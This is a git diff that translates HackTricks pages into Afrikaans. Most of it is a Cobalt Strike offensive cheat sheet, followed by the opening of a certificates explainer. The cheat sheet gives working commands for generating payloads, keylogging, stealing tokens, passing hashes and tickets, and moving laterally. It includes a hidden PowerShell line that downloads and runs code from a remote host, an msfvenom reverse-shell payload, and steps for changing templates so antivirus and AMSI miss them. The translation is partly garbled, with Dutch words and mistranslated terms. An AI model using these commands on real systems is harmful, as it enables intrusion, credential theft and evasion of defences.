@ -32,16 +30,14 @@ Other ways to support HackTricks:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,217 +1,206 @@
|
|||
# Cobalt Strike
|
||||
|
||||
### Listeners
|
||||
### Luisteraars
|
||||
|
||||
### C2 Listeners
|
||||
### C2 Luisteraars
|
||||
|
||||
`Cobalt Strike -> Listeners -> Add/Edit` then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more.
|
||||
`Cobalt Strike -> Luisteraars -> Toevoegen/Bewerken` dan kan jy kies waar om te luister, watter soort beacon om te gebruik (http, dns, smb...) en meer.
|
||||
|
||||
### Peer2Peer Listeners
|
||||
### Peer2Peer Luisteraars
|
||||
|
||||
The beacons of these listeners don't need to talk to the C2 directly, they can communicate to it through other beacons.
|
||||
Die beacons van hierdie luisteraars hoef nie direk met die C2 te praat nie, hulle kan daarmee kommunikeer deur ander beacons.
|
||||
|
||||
`Cobalt Strike -> Listeners -> Add/Edit` then you need to select the TCP or SMB beacons
|
||||
`Cobalt Strike -> Luisteraars -> Toevoegen/Bewerken` dan moet jy die TCP of SMB beacons kies
|
||||
|
||||
* The **TCP beacon will set a listener in the port selected**. To connect to a TCP beacon use the command `connect <ip> <port>` from another beacon
|
||||
* The **smb beacon will listen in a pipename with the selected name**. To connect to a SMB beacon you need to use the command `link [target] [pipe]`.
|
||||
* Die **TCP beacon sal 'n luisteraar op die gekose poort stel**. Om aan te sluit by 'n TCP beacon gebruik die opdrag `connect <ip> <port>` van 'n ander beacon
|
||||
* Die **smb beacon sal luister in 'n pypnaam met die gekose naam**. Om aan te sluit by 'n SMB beacon moet jy die opdrag `link [target] [pipe]` gebruik.
|
||||
|
||||
### Generate & Host payloads
|
||||
### Genereer & Berg payloads op
|
||||
|
||||
#### Generate payloads in files
|
||||
#### Genereer payloads in lêers
|
||||
|
||||
`Attacks -> Packages ->` 
|
||||
`Aanvalle -> Pakkette ->` 
|
||||
|
||||
* **`HTMLApplication`** for HTA files
|
||||
* **`MS Office Macro`** for an office document with a macro
|
||||
* **`Windows Executable`** for a .exe, .dll orr service .exe
|
||||
* **`Windows Executable (S)`** for a **stageless** .exe, .dll or service .exe (better stageless than staged, less IoCs)
|
||||
* **`HTMLApplication`** vir HTA lêers
|
||||
* **`MS Office Macro`** vir 'n kantoor dokument met 'n makro
|
||||
* **`Windows Uitvoerbare`** vir 'n .exe, .dll of diens .exe
|
||||
* **`Windows Uitvoerbare (S)`** vir 'n **stageless** .exe, .dll of diens .exe (beter stageless as staged, minder IoCs)
|
||||
|
||||
#### Generate & Host payloads
|
||||
#### Genereer & Berg payloads op
|
||||
|
||||
`Attacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
|
||||
`Aanvalle -> Web Drive-by -> Geskripteerde Web Aflewering (S)` Dit sal 'n skrip/uitvoerbare lêer genereer om die beacon van cobalt strike af te laai in formate soos: bitsadmin, exe, powershell en python
|
||||
|
||||
#### Host Payloads
|
||||
#### Berg Payloads op
|
||||
|
||||
If you already has the file you want to host in a web sever just go to `Attacks -> Web Drive-by -> Host File` and select the file to host and web server config.
|
||||
As jy reeds die lêer het wat jy wil berg in 'n webbediener, gaan net na `Aanvalle -> Web Drive-by -> Berg Lêer op` en kies die lêer om op te berg en webbediener konfigurasie.
|
||||
|
||||
### Beacon Options
|
||||
### Beacon Opsies
|
||||
|
||||
<pre class="language-bash"><code class="lang-bash"># Execute local .NET binary
|
||||
<pre class="language-bash"><code class="lang-bash"># Voer plaaslike .NET binêre uit
|
||||
execute-assembly </path/to/executable.exe>
|
||||
|
||||
# Screenshots
|
||||
printscreen # Take a single screenshot via PrintScr method
|
||||
screenshot # Take a single screenshot
|
||||
screenwatch # Take periodic screenshots of desktop
|
||||
## Go to View -> Screenshots to see them
|
||||
# Skermskote
|
||||
printscreen # Neem 'n enkele skermskoot via die PrintScr metode
|
||||
screenshot # Neem 'n enkele skermskoot
|
||||
screenwatch # Neem periodieke skermskote van die skerm
|
||||
## Gaan na View -> Skermskote om hulle te sien
|
||||
|
||||
# keylogger
|
||||
# sleutellogger
|
||||
keylogger [pid] [x86|x64]
|
||||
## View > Keystrokes to see the keys pressed
|
||||
## View > Keystrokes om die gedrukte sleutels te sien
|
||||
|
||||
# portscan
|
||||
portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inject portscan action inside another process
|
||||
# poortskandering
|
||||
portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Injecteer poortskandering aksie binne 'n ander proses
|
||||
portscan [targets] [ports] [arp|icmp|none] [max connections]
|
||||
|
||||
# Powershell
|
||||
# Import Powershell module
|
||||
# Importeer Powershell module
|
||||
powershell-import C:\path\to\PowerView.ps1
|
||||
powershell <just write powershell cmd here>
|
||||
powershell <skryf net powershell opdrag hier>
|
||||
|
||||
# User impersonation
|
||||
## Token generation with creds
|
||||
make_token [DOMAIN\user] [password] #Create token to impersonate a user in the network
|
||||
ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
|
||||
rev2self # Stop using token generated with make_token
|
||||
## The use of make_token generates event 4624: An account was successfully logged on. This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type. As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.
|
||||
# Gebruiker simulasie
|
||||
## Token generasie met geloofsbriewe
|
||||
make_token [DOMAIN\user] [password] # Skep 'n token om 'n gebruiker in die netwerk te simuleer
|
||||
ls \\computer_name\c$ # Probeer om die gegenereerde token te gebruik om toegang te verkry tot C$ op 'n rekenaar
|
||||
rev2self # Hou op om die token wat gegenereer is met make_token te gebruik
|
||||
## Die gebruik van make_token genereer gebeurtenis 4624: 'n Rekening is suksesvol aangemeld. Hierdie gebeurtenis is baie algemeen in 'n Windows domein, maar kan beperk word deur te filtreer op die Aanmeldingstipe. Soos hierbo genoem, gebruik dit LOGON32_LOGON_NEW_CREDENTIALS wat tipe 9 is.
|
||||
|
||||
# UAC Bypass
|
||||
elevate svc-exe <listener>
|
||||
elevate uac-token-duplication <listener>
|
||||
elevate svc-exe <luisteraar>
|
||||
elevate uac-token-duplication <luisteraar>
|
||||
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
|
||||
|
||||
## Steal token from pid
|
||||
## Like make_token but stealing the token from a process
|
||||
steal_token [pid] # Also, this is useful for network actions, not local actions
|
||||
## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated <current_username> - it's impersonating our own cloned token.
|
||||
ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
|
||||
rev2self # Stop using token from steal_token
|
||||
## Steel token van pid
|
||||
## Soos make_token, maar steel die token van 'n proses
|
||||
steal_token [pid] # Dit is ook nuttig vir netwerkaksies, nie plaaslike aksies nie
|
||||
## Uit die API-dokumentasie weet ons dat hierdie aanmeldingstipe "die oproeper in staat stel om sy huidige token te kloon". Dit is hoekom die Beacon-uitset sê Impersonated <current_username> - dit simuleer ons eie gekloonde token.
|
||||
ls \\computer_name\c$ # Probeer om die gegenereerde token te gebruik om toegang te verkry tot C$ op 'n rekenaar
|
||||
rev2self # Hou op om die token van steal_token te gebruik
|
||||
|
||||
## Launch process with nwe credentials
|
||||
spawnas [domain\username] [password] [listener] #Do it from a directory with read access like: cd C:\
|
||||
## Like make_token, this will generate Windows event 4624: An account was successfully logged on but with a logon type of 2 (LOGON32_LOGON_INTERACTIVE). It will detail the calling user (TargetUserName) and the impersonated user (TargetOutboundUserName).
|
||||
## Lancering van proses met nuwe geloofsbriewe
|
||||
spawnas [domain\username] [password] [luisteraar] # Doen dit vanaf 'n gids met leestoegang soos: cd C:\
|
||||
## Soos make_token, sal dit Windows-gebeurtenis 4624 genereer: 'n Rekening is suksesvol aangemeld, maar met 'n aanmeldingstipe van 2 (LOGON32_LOGON_INTERACTIVE). Dit sal die oproepende gebruiker (TargetUserName) en die gesimuleerde gebruiker (TargetOutboundUserName) beskryf.
|
||||
|
||||
## Inject into process
|
||||
inject [pid] [x64|x86] [listener]
|
||||
## From an OpSec point of view: Don't perform cross-platform injection unless you really have to (e.g. x86 -> x64 or x64 -> x86).
|
||||
## Injecteer in proses
|
||||
inject [pid] [x64|x86] [luisteraar]
|
||||
## Vanuit 'n OpSec-oogpunt: Moenie kruisplatform-injectie uitvoer tensy jy regtig moet nie (bv. x86 -> x64 of x64 -> x86).
|
||||
|
||||
## Pass the hash
|
||||
## This modification process requires patching of LSASS memory which is a high-risk action, requires local admin privileges and not all that viable if Protected Process Light (PPL) is enabled.
|
||||
## Pass die hash
|
||||
## Hierdie wysigingsproses vereis patching van LSASS-geheue wat 'n hoë-risiko-aksie is, vereis plaaslike admin-voorregte en is nie altyd lewensvatbaar as Protected Process Light (PPL) geaktiveer is nie.
|
||||
pth [pid] [arch] [DOMAIN\user] [NTLM hash]
|
||||
pth [DOMAIN\user] [NTLM hash]
|
||||
|
||||
## Pass the hash through mimikatz
|
||||
## Pass die hash deur mimikatz
|
||||
mimikatz sekurlsa::pth /user:<username> /domain:<DOMAIN> /ntlm:<NTLM HASH> /run:"powershell -w hidden"
|
||||
## Withuot /run, mimikatz spawn a cmd.exe, if you are running as a user with Desktop, he will see the shell (if you are running as SYSTEM you are good to go)
|
||||
steal_token <pid> #Steal token from process created by mimikatz
|
||||
## Sonder /run, sal mimikatz 'n cmd.exe spawn, as jy as 'n gebruiker met 'n skerm hardloop, sal hy die skerm sien (as jy as SYSTEM hardloop, is jy reg om te gaan)
|
||||
steal_token <pid> #Steel token van proses wat deur mimikatz geskep is
|
||||
|
||||
## Pass the ticket
|
||||
## Request a ticket
|
||||
## Pass die kaartjie
|
||||
## Versoek 'n kaartjie
|
||||
execute-assembly C:\path\Rubeus.exe asktgt /user:<username> /domain:<domain> /aes256:<aes_keys> /nowrap /opsec
|
||||
## Create a new logon session to use with the new ticket (to not overwrite the compromised one)
|
||||
## Skep 'n nuwe aanmeldsessie om saam met die nuwe kaartjie te gebruik (om nie die gekompromitteerde een te oorskryf nie)
|
||||
make_token <domain>\<username> DummyPass
|
||||
## Write the ticket in the attacker machine from a poweshell session & load it
|
||||
## Skryf die kaartjie in die aanvaller se masjien vanuit 'n poweshell-sessie & laai dit
|
||||
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
|
||||
kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
|
||||
|
||||
## Pass the ticket from SYSTEM
|
||||
## Generate a new process with the ticket
|
||||
## Pass die kaartjie vanaf SYSTEM
|
||||
## Skep 'n nuwe proses met die kaartjie
|
||||
execute-assembly C:\path\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:<AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
|
||||
## Steal the token from that process
|
||||
## Steel die token van daardie proses
|
||||
steal_token <pid>
|
||||
|
||||
## Extract ticket + Pass the ticket
|
||||
### List tickets
|
||||
## Haal kaartjie uit + Pass die kaartjie
|
||||
### Lys kaartjies
|
||||
execute-assembly C:\path\Rubeus.exe triage
|
||||
### Dump insteresting ticket by luid
|
||||
### Dump interessante kaartjie deur luid
|
||||
execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
|
||||
### Create new logon session, note luid and processid
|
||||
execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
|
||||
### Insert ticket in generate logon session
|
||||
execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
|
||||
### Finally, steal the token from that new process
|
||||
### Skep 'n nuwe aanmeldsessie, neem luid en proses-ID op
|
||||
execute-assembly C:\pad\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
|
||||
### Voeg kaartjie in in gegenereerde aanmeldsessie
|
||||
execute-assembly C:\pad\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-kaartjie...]
|
||||
### Steel uiteindelik die token van daardie nuwe proses
|
||||
steal_token <pid>
|
||||
|
||||
# Lateral Movement
|
||||
## If a token was created it will be used
|
||||
jump [method] [target] [listener]
|
||||
## Methods:
|
||||
## psexec x86 Use a service to run a Service EXE artifact
|
||||
## psexec64 x64 Use a service to run a Service EXE artifact
|
||||
## psexec_psh x86 Use a service to run a PowerShell one-liner
|
||||
## winrm x86 Run a PowerShell script via WinRM
|
||||
## winrm64 x64 Run a PowerShell script via WinRM
|
||||
# Laterale beweging
|
||||
## As 'n token geskep is, sal dit gebruik word
|
||||
jump [metode] [teiken] [luisteraar]
|
||||
## Metodes:
|
||||
## psexec x86 Gebruik 'n diens om 'n Service EXE-artefak uit te voer
|
||||
## psexec64 x64 Gebruik 'n diens om 'n Service EXE-artefak uit te voer
|
||||
## psexec_psh x86 Gebruik 'n diens om 'n PowerShell-eenreëliner uit te voer
|
||||
## winrm x86 Voer 'n PowerShell-skripsie uit via WinRM
|
||||
## winrm64 x64 Voer 'n PowerShell-skripsie uit via WinRM
|
||||
|
||||
remote-exec [method] [target] [command]
|
||||
## Methods:
|
||||
<strong>## psexec Remote execute via Service Control Manager
|
||||
</strong>## winrm Remote execute via WinRM (PowerShell)
|
||||
## wmi Remote execute via WMI
|
||||
remote-exec [metode] [teiken] [opdrag]
|
||||
## Metodes:
|
||||
<strong>## psexec Voer op afstand uit via die Diensbeheerder
|
||||
</strong>## winrm Voer op afstand uit via WinRM (PowerShell)
|
||||
## wmi Voer op afstand uit via WMI
|
||||
|
||||
## To execute a beacon with wmi (it isn't ins the jump command) just upload the beacon and execute it
|
||||
## Om 'n beacon met wmi uit te voer (dit is nie in die jump-opdrag nie) laai net die beacon op en voer dit uit
|
||||
beacon> upload C:\Payloads\beacon-smb.exe
|
||||
beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe
|
||||
|
||||
|
||||
# Pass session to Metasploit - Through listener
|
||||
## On metaploit host
|
||||
# Gee sessie aan Metasploit - Deur middel van 'n luisteraar
|
||||
## Op Metasploit-gashuis
|
||||
msf6 > use exploit/multi/handler
|
||||
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
|
||||
msf6 exploit(multi/handler) > set LHOST eth0
|
||||
msf6 exploit(multi/handler) > set LPORT 8080
|
||||
msf6 exploit(multi/handler) > exploit -j
|
||||
|
||||
## On cobalt: Listeners > Add and set the Payload to Foreign HTTP. Set the Host to 10.10.5.120, the Port to 8080 and click Save.
|
||||
## Op cobalt: Luisteraars > Voeg by en stel die Payload in op Foreign HTTP. Stel die Host in op 10.10.5.120, die Poort op 8080 en klik op Stoor.
|
||||
beacon> spawn metasploit
|
||||
## You can only spawn x86 Meterpreter sessions with the foreign listener.
|
||||
## Jy kan slegs x86 Meterpreter-sessies spawn met die vreemde luisteraar.
|
||||
|
||||
# Pass session to Metasploit - Through shellcode injection
|
||||
## On metasploit host
|
||||
# Gee sessie aan Metasploit - Deur middel van shellcode-injeksie
|
||||
## Op Metasploit-gashuis
|
||||
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f raw -o /tmp/msf.bin
|
||||
## Run msfvenom and prepare the multi/handler listener
|
||||
## Voer msfvenom uit en berei die multi/handler-luisteraar voor
|
||||
|
||||
## Copy bin file to cobalt strike host
|
||||
## Kopieer binêre lêer na cobalt strike-gashuis
|
||||
ps
|
||||
shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process
|
||||
shinject <pid> x64 C:\Payloads\msf.bin #Injecteer Metasploit shellcode in 'n x64-proses
|
||||
|
||||
# Pass metasploit session to cobalt strike
|
||||
## Fenerate stageless Beacon shellcode, go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.
|
||||
## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode
|
||||
# Gee Metasploit-sessie aan cobalt strike
|
||||
## Genereer stageless Beacon shellcode, gaan na Aanvalle > Pakkette > Windows Uitvoerbare lêer (S), kies die gewenste luisteraar, kies Raw as die Uitvoertipe en kies Gebruik x64-payload.
|
||||
## Gebruik post/windows/manage/shellcode_inject in Metasploit om die gegenereerde cobalt strike shellcode in te spuit
|
||||
|
||||
|
||||
# Pivoting
|
||||
## Open a socks proxy in the teamserver
|
||||
## Maak 'n sokkiesproksi oop in die spanbediener
|
||||
beacon> socks 1080
|
||||
|
||||
# SSH connection
|
||||
beacon> ssh 10.10.17.12:22 username password</code></pre>
|
||||
# SSH-verbinding
|
||||
beacon> ssh 10.10.17.12:22 gebruikersnaam wagwoord</code></pre>
|
||||
|
||||
## Avoiding AVs
|
||||
## Vermy AV's
|
||||
|
||||
### Artifact Kit
|
||||
### Artefaktkit
|
||||
|
||||
Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons.
|
||||
Gewoonlik in `/opt/cobaltstrike/artifact-kit` kan jy die kode en vooraf saamgestelde sjablone (in `/src-common`) van die payloads vind wat cobalt strike gaan gebruik om die binêre beacons te genereer.
|
||||
|
||||
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary.
|
||||
|
||||
After modifying the code just run `./build.sh` from the same directory and copy the `dist-pipe/` folder into the Windows client in `C:\Tools\cobaltstrike\ArtifactKit`.
|
||||
Deur [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) te gebruik met die gegenereerde agterdeur (of net met die saamgestelde sjabloon) kan jy vind wat verdediger aktiveer. Dit is gewoonlik 'n string. Jy kan dus net die kode wat die agterdeur genereer wysig sodat daardie string nie in die finale binêre lêer verskyn nie.
|
||||
|
||||
Nadat jy die kode gewysig het, voer jy net `./build.sh` uit vanuit dieselfde gids en kopieer die `dist-pipe/`-gids na die Windows-kliënt in `C:\Tools\cobaltstrike\ArtifactKit`.
|
||||
```
|
||||
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
|
||||
```
|
||||
Moenie vergeet om die aggressiewe skrip `dist-pipe\artifact.cna` te laai om aan te dui dat Cobalt Strike die hulpbronne vanaf die skyf moet gebruik wat ons wil hê en nie die een wat gelaai is nie.
|
||||
|
||||
Don't forget to load the aggressive script `dist-pipe\artifact.cna` to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded.
|
||||
### Hulpbronpakket
|
||||
|
||||
### Resource Kit
|
||||
|
||||
The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA.
|
||||
|
||||
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templates you can find what is defender (AMSI in this case) not liking and modify it:
|
||||
Die Hulpbronpakket-vouer bevat die sjablone vir Cobalt Strike se skripsgebaseerde vragte, insluitend PowerShell, VBA en HTA.
|
||||
|
||||
Deur [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) saam met die sjablone te gebruik, kan jy vind wat die verdediger (AMSI in hierdie geval) nie wil hê nie en dit wysig:
|
||||
```
|
||||
.\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1
|
||||
```
|
||||
### Verander die opgespoorde lyne sodat jy 'n sjabloon kan genereer wat nie opgemerk sal word nie.
|
||||
|
||||
Modifying the detected lines one can generate a template that won't be caught.
|
||||
|
||||
Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Moenie vergeet om die aggressiewe skrip `ResourceKit\resources.cna` te laai om aan te dui dat Cobalt Strike die hulpbronne vanaf die skyf moet gebruik wat ons wil hê en nie die een wat gelaai is nie.
|
||||
```bash
|
||||
cd C:\Tools\neo4j\bin
|
||||
neo4j.bat console
|
||||
|
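Review bot: Cobalt Strike menu paths in this hunk are translated although the client only shows English menus, so readers cannot follow them: `Cobalt Strike -> Luisteraars -> Toevoegen/Bewerken` (and `Toevoegen/Bewerken` is Dutch, not Afrikaans), `Aanvalle -> Pakkette -> ... Windows Uitvoerbare (S)`, `Aanvalle -> Web Drive-by -> Geskripteerde Web Aflewering (S)`, `Berg Lêer op` and `View -> Skermskote`; keep the labels as `Listeners -> Add/Edit`, `Attacks -> Packages -> Windows Executable (S)`, `Attacks -> Web Drive-by -> Scripted Web Delivery (S)` / `Host File` and `View -> Screenshots`, with an Afrikaans gloss in parentheses if wanted. The same applies to the product names `Artefaktkit` and `Hulpbronpakket`: the directories (`artifact-kit`, `ResourceKit`) and scripts (`artifact.cna`, `resources.cna`) referenced on the same lines keep the English names, so the headings should stay `Artifact Kit` and `Resource Kit`. A few terms are mistranslated: `sokkiesproksi` for the SOCKS proxy (`socks 1080` is the protocol name, use `SOCKS-proksi`), `gashuis` (guesthouse) for host where `gasheer` is meant, and `hy sal die skerm sien` (he will see the screen) for "he will see the shell" in the mimikatz `/run` comment. The placeholder `C:\path\Rubeus.exe` became `C:\pad\Rubeus.exe` only in the `createnetonly` and `ptt` lines while the `asktgt`, `triage` and `dump` lines keep `C:\path\`; pick one. Finally, the sentence "Modifying the detected lines one can generate a template that won't be caught." was turned into an H3 heading (`### Verander die opgespoorde lyne ...`) in the Resource Kit section, which changes the page structure; it should stay a plain paragraph.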
@ -233,3 +222,4 @@ pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
|
|||
|
||||
|
||||
```
|
||||
|
||||
|
|
|
@ -1,59 +1,58 @@
|
|||
# Certificates
|
||||
# Sertifikate
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloei** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry vandag toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
## What is a Certificate
|
||||
## Wat is 'n Sertifikaat
|
||||
|
||||
A **public key certificate** is a digital ID used in cryptography to prove someone owns a public key. It includes the key's details, the owner's identity (the subject), and a digital signature from a trusted authority (the issuer). If the software trusts the issuer and the signature is valid, secure communication with the key's owner is possible.
|
||||
'n **Openbare sleutel sertifikaat** is 'n digitale ID wat in kriptografie gebruik word om te bewys dat iemand 'n openbare sleutel besit. Dit sluit die sleutel se besonderhede, die eienaar se identiteit (die onderwerp), en 'n digitale handtekening van 'n vertroude gesag (die uitreiker) in. As die sagteware die uitreiker vertrou en die handtekening geldig is, is veilige kommunikasie met die sleutel se eienaar moontlik.
|
||||
|
||||
Certificates are mostly issued by [certificate authorities](https://en.wikipedia.org/wiki/Certificate_authority) (CAs) in a [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) setup. Another method is the [web of trust](https://en.wikipedia.org/wiki/Web_of_trust), where users directly verify each other’s keys. The common format for certificates is [X.509](https://en.wikipedia.org/wiki/X.509), which can be adapted for specific needs as outlined in RFC 5280.
|
||||
Sertifikate word meestal uitgereik deur [sertifikaatowerhede](https://en.wikipedia.org/wiki/Certificate_authority) (SO's) in 'n [openbare sleutel infrastruktuur](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) opset. 'n Ander metode is die [web van vertroue](https://en.wikipedia.org/wiki/Web_of_trust), waar gebruikers mekaar se sleutels direk verifieer. Die algemene formaat vir sertifikate is [X.509](https://en.wikipedia.org/wiki/X.509), wat aangepas kan word vir spesifieke behoeftes soos uiteengesit in RFC 5280.
|
||||
|
||||
## x509 Common Fields
|
||||
## x509 Algemene Velde
|
||||
|
||||
### **Common Fields in x509 Certificates**
|
||||
### **Algemene Velde in x509 Sertifikate**
|
||||
|
||||
In x509 certificates, several **fields** play critical roles in ensuring the certificate's validity and security. Here's a breakdown of these fields:
|
||||
In x509 sertifikate speel verskeie **velde** 'n kritieke rol om die geldigheid en veiligheid van die sertifikaat te verseker. Hier is 'n uiteensetting van hierdie velde:
|
||||
|
||||
- **Version Number** signifies the x509 format's version.
|
||||
- **Serial Number** uniquely identifies the certificate within a Certificate Authority's (CA) system, mainly for revocation tracking.
|
||||
- The **Subject** field represents the certificate's owner, which could be a machine, an individual, or an organization. It includes detailed identification such as:
|
||||
- **Common Name (CN)**: Domains covered by the certificate.
|
||||
- **Country (C)**, **Locality (L)**, **State or Province (ST, S, or P)**, **Organization (O)**, and **Organizational Unit (OU)** provide geographical and organizational details.
|
||||
- **Distinguished Name (DN)** encapsulates the full subject identification.
|
||||
- **Issuer** details who verified and signed the certificate, including similar subfields as the Subject for the CA.
|
||||
